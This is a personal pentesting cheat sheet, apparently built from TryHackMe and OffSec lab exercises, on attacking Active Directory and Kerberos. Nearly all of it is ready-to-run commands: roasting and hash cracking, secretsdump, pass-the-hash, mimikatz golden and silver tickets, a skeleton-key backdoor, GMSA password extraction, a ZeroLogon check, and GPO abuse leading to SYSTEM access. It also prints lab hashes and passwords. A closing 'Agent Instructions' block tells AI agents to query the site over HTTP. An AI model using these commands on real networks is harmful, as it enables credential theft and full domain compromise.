# Kerberos (88) / Active Directory (AD)

## Active Directory Exploitation Cheat Sheet

[S1ckB0y1337](https://github.com/S1ckB0y1337)/[**Active-Directory-Exploitation-Cheat-Sheet**](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)

## Enumeration

### AD LDAP enumeration

\
`ldapsearch -x -h $IP -s base` # to get the naming context\
`ldapsearch -x -h "192.168.141.122" -b "DC=hutch,DC=offsec"` # using naming context found above

### Impacket-GetNPUsers

The command below checks for accounts that do not need pre-authentication. Crack them with `hashcat`.

`impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -dc-ip 10.10.199.242 -format hashcat -outputfile npusers2.hashcat`

`hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt`

### Kerbrute Enumeration - No domain access required

`./kerbrute userenum --dc $IP -d $NetbiosDomainName ~/THM/kerbrute-room/users.lst`

### impacket-secretsdump - Authenticated user

`impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122`

### Pass the Hash through Evil-WinRM

`evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc`

### Pass the Ticket - Access as a user to the domain required

`rubeus.exe harvest /interval:30` (harvest for TGTs every 30 seconds)

`Rubeus.exe brute /password:Password1 /noticket`

### Kerberoasting - Access as any user required

#### Rubeus Method

`Rubeus.exe kerberoast`

now that you have some hashes save those into a text file and crack them with hashcat.&#x20;

`hashcat -m 13100 -a 0 hash.txt Pass.txt`

#### Impacket Method

`sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.77.32 -request`

### AS-REP Roasting - Access as any user required

`rubeus.exe asreproast`

When adding the hashes to a text file remember to add `23$` after `$krb5asrep$` so that the first line will be `$krb5asrep$23$User...`

`hashcat -m 18200 hash.txt pass.txt`

### Pass the Ticket w/ mimikatz

run `mimikatz.exe`

run `privilege:debug` ensure this outputs '20' OK

`sekurlsa::tickets /export`

Look for a .kirbi file for an account you may already have access such as the 'Adminitrator' account.

Run `kerberso:ptt $ticketFile` to impersonate the given ticket

Exit mimikatz and run `klist` to confirm you are using the cached ticket

You should now have Domain Admin rights

### Golden/Silver Ticket Attacks w/ mimikatz

* Golden ticket means that you are able to generate a TGT for any service you want.
  * Full domain compromise (domain admin) required
* Silver ticket means that you are taking a specific service's TGT and can impersonate it.
  * Service hash required
* Skeleton Key
  * Full domain compromised (domain admin) required

Run mimikatz

privilege::debug to confirm access

`lsadump::lsa /inject /name:krbtgt` to dump hashes and other identifiers needed to create a golden ticket. To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.

You will need to know the user's User ID for the next mimikatz command. You can find this by running the command below (look at the last 3-4 digits).

```
wmic useraccount where name='%username%' get sid
```

`kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtg t:72cd714611b64cd4d5550cd2759db3f6 /id:500` This is the command for creating a golden ticket; to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.

`misc::cmd` this will open a new elevated command prompt with the given ticket in mimikatz. You now have the permissions depending on golden ticket or silver ticket used.

### Dump all NTLM hashes with mimikatz

lsadump::lsa /patch

Crack with `hashcat -a 0 -O -m 1000 $hash /usr/share/wordlists/rockyou.txt`

### Kerberos Backdoors w/ mimikatz

`misc::skeleton`

net use c:\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz

dir \Desktop-1\c$ /user:Machine1 mimikatz

## Exploitation

### Group Managed Service Accounts (GMSA)

Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.

These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the <mark style="color:purple;">PrincipalsAllowedToRetrieveManagedPassword</mark> user property on the account.

`Get-ADServiceAccount -Identity $serviceAcc -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword`

If we have access to an account that is in the same group as the service account then we should be able to extract the password hash of the service account.

```
*Evil-WinRM* PS C:\Users\enox\Documents> Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'


DistinguishedName    : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : svc_apache
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName       : svc_apache$
SID                  : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName    :


*Evil-WinRM* PS C:\Users\enox\Documents> $gmsa = Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp = $gmsa.'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp
1
0
0
0
36
...
```

Looks like we have the <mark style="color:purple;">ReadGMSAPassword</mark> privilege on the svc\_apache account.

We can retrieve the password hash with [GMSAPasswordReader](https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe).&#x20;

```
*Evil-WinRM* PS C:\Users\enox\Documents> C:/Users/enox/Documents/GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : EA5055089775D4E018B085C20648D794
[*]       aes128_cts_hmac_sha1 : 4AD57573D862D85482A24107EE8A48AC
[*]       aes256_cts_hmac_sha1 : 8DD276B6CD4EDC9497448ED17FB66842736291C3A109A905C584B84508635795
[*]       des_cbc_md5          : 312FDCDA9DADDCCD

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : DEB6F85CF5EAE0951DD89F4AFD884AE5
[*]       aes128_cts_hmac_sha1 : C5A97007F3CA002059FD8A98962760D0
[*]       aes256_cts_hmac_sha1 : 0DA099CCCBE0C0D6F5EB06E465B7CF05FF069E5E625DD10DA009CA9A795E6E8F
[*]       des_cbc_md5          : 9E340723700454E9

```

We  have the service account password hash and can use this for pass the hash logins (evil-winrm needs the $ sign at the end when logging in with hash).

### ZeroLogon

This will break Active Directory so only use it to check if the exploit is possible

`python3 zerologon.py -do check -target ATTACKTIVEDIRECT -ip $IP`

### GPO Abuse via SharpGPOAbuse

If our user has access to the <mark style="color:purple;">GpoEditDeleteModifySecurity</mark> permission then we can give ourselves local administrator privileges. We can confirm this by running `Get-NetGPO` and running the <mark style="color:purple;">name GUID string</mark> through G`et-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh`

`./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"`

`gpupdate /force` updates Group Policies

`net localgroup Administrators` verify we are now in the Administrator group

`python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:SecureHM@192.168.120.116` to get SYSTEM access


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.davila.me/menu/services/kerberos-88-active-directory-ad.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.